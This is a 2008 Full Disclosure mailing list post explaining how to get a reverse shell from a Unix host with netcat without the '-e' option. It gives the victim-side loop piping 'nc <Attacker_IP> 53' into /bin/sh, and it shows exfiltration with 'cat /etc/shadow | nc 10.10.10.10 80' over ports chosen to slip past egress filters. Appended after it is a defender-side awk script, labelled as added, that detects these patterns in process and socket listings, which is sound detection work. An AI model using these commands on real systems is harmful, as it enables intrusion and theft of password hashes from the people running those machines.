Full Disclosure mailing list archives
Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE"
From: 545945 <545945 () gmail com>
Date: Fri, 19 Sep 2008 18:01:23 -0400
Recently a friend of mine asked me a seemingly simple question: what is the easiest method to get a reverse shell from a *nix based system using Netcat? He then added a caveat, that he did not want to worry about recompiling the source to enable the "GAPING_SECURITY_HOLE" option that allows you to bind a shell using "-e".

My first thought was to say "Dude, go check Google and stop bothering me with this piddly shit", however I have in the past had this same discussion with others, and trying to construct a Google search string and get meaningful results on this subject can prove very irritating. Because of this I gave in and told him the method I use, which is laid out below. I then had the thought that I should post it somewhere else so it was a little easier for the next person to find. I say "somewhere else" because I can only assume that I am not the first person to post this method.

While the method below does not provide a "TRUE" interactive shell, it is the next best thing and is more than suitable for most hacking endeavours, including simple interactive steps like setting passwords. I know there are other methods out there, but I like this one as it provides an easy method without worrying if any particular scripting language was installed or the proper options were compiled in with the default shell.

There will undoubtedly be debate on what the best ports are to use and whether or not this is even a recommended way to do things. I chose ports 53 & 80 as they are the ones that I find have the most success of getting out of a network untouched. As with all things, any number of factors can get in the way of proper communication using this method.

-------- STEP (1) --------

On the attacker host open a terminal window that you want to receive the output of your commands in and run:

    nc -k -v -l 80

-------- STEP (2) --------

On the attacker host open a terminal window that you want to enter your commands in and run:

    nc -k -v -l 53

-------- STEP (3) --------

On the victim host run:

    while true ; do nc <Attacker_IP> 53 | /bin/sh ; done

You should then see a message appear in the window opened in STEP (2) similar to:

    Connection from <Victim_IP> port 53 accepted

NOTE: I use the "-k" option and "while loops" in these steps to ensure that if there are any intermittent communication issues I don't have to re-establish any of the sessions.

Assuming that there are no communication issues like firewalls, routing, DNS, PEBCAK errors, etc. getting in the way, then the command you entered in STEP (3) will connect to the session started in STEP (2).

"Great, now what?" you ask. Well, all you do is enter the commands you want to run in the STEP (2) window using the formatting below, and the output will display in the window opened for STEP (1).

    Syntax:  <command> | nc <Attacker_IP> 80
    Example: cat /etc/shadow | nc 10.10.10.10 80

There are lots of variations on this using multiple hosts and single ports, but I leave that up to you to experiment.

That's it and happy hunting...

--545945
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
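The two shapes the post relies on, a netcat client piped into /bin/sh and command output piped into a netcat client headed for port 53 or 80, are also the shapes a host-based check can look for. The script below is an added defender-side example and is not part of the original message or any reply to it: two awk filters run over a constructed process listing (in the layout of `ps -eo pid,user,args`) and a constructed socket table (in the layout of `ss -tnp`). The sample lines, the addresses and the function names are assumptions made up for this example.

```shell
#!/bin/sh
# Added example (not from the post): flag the two patterns the post uses,
#   nc <host> <port> | /bin/sh          (commands in, via port 53)
#   <command> | nc <host> <port>        (output out, via port 80)
# in process and socket listings. All sample data below is constructed.

# Constructed process listing in the layout of `ps -eo pid,user,args`.
SAMPLE_PS='  101 root     /usr/sbin/sshd -D
  202 www      sh -c while true ; do nc 10.10.10.10 53 | /bin/sh ; done
  203 www      nc 10.10.10.10 53
  204 www      /bin/sh
  305 backup   nc -l 8080
  306 dev      cat /etc/shadow | nc 10.10.10.10 80'

# Constructed socket table in the layout of `ss -tnp`.
SAMPLE_SS='State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 192.168.1.5:41234 10.10.10.10:53 users:(("nc",pid=203,fd=3))
ESTAB 0 0 192.168.1.5:41235 10.10.10.10:80 users:(("nc",pid=306,fd=3))
ESTAB 0 0 192.168.1.5:22 192.168.1.9:50012 users:(("sshd",pid=101,fd=4))
ESTAB 0 0 192.168.1.5:41300 93.184.216.34:443 users:(("curl",pid=410,fd=5))'

# Print the PID of every process whose command line either pipes a netcat
# client into a shell or pipes command output into a netcat client.
find_nc_shell_pipes() {
    printf '%s\n' "$1" | awk '
        # nc <host> <port> | sh   (also /bin/sh, bash, /bin/bash)
        /(^|[^A-Za-z])nc[^|]*\|[[:space:]]*(\/bin\/)?(ba)?sh([[:space:]]|$)/ { print $1; next }
        # <command> | nc <host> <port>
        /\|[[:space:]]*nc[[:space:]]+[0-9.]+[[:space:]]+[0-9]+/ { print $1 }
    '
}

# Print the PID behind every established netcat socket whose peer port is
# 53 or 80. DNS and HTTP traffic is expected from resolvers and browsers,
# not from nc, which is exactly why those ports pass egress filters so often.
find_nc_egress() {
    printf '%s\n' "$1" | awk '
        $1 == "ESTAB" && $6 ~ /"(nc|ncat|netcat)"/ {
            split($5, peer, ":")                 # peer[1] = address, peer[2] = port
            if (peer[2] == 53 || peer[2] == 80) {
                match($6, /pid=[0-9]+/)          # pull the pid out of users:((...))
                print substr($6, RSTART + 4, RLENGTH - 4)
            }
        }
    '
}

echo "processes piping nc into a shell or a shell into nc:"
find_nc_shell_pipes "$SAMPLE_PS"
echo "nc sockets established to port 53 or 80:"
find_nc_egress "$SAMPLE_SS"
```

On a live host the two functions would be fed `ps -eo pid,user,args` and `ss -tnp` instead of the constructed strings; the `-k` and `while true` wrappers the post recommends mean the `nc` process and its socket are re-created after every drop, so a check run on a schedule sees them rather than a one-off connection.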
Current thread:
- Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" 545945 (Sep 19)
- Re: Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" Kurt Buff (Sep 19)
- Re: Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" 545945 (Sep 19)
- Re: Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" Davide Guerri (Sep 19)
- Re: Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" Robert McKay (Sep 19)
- Re: Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" 545945 (Sep 19)
- Re: Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" Kurt Buff (Sep 19)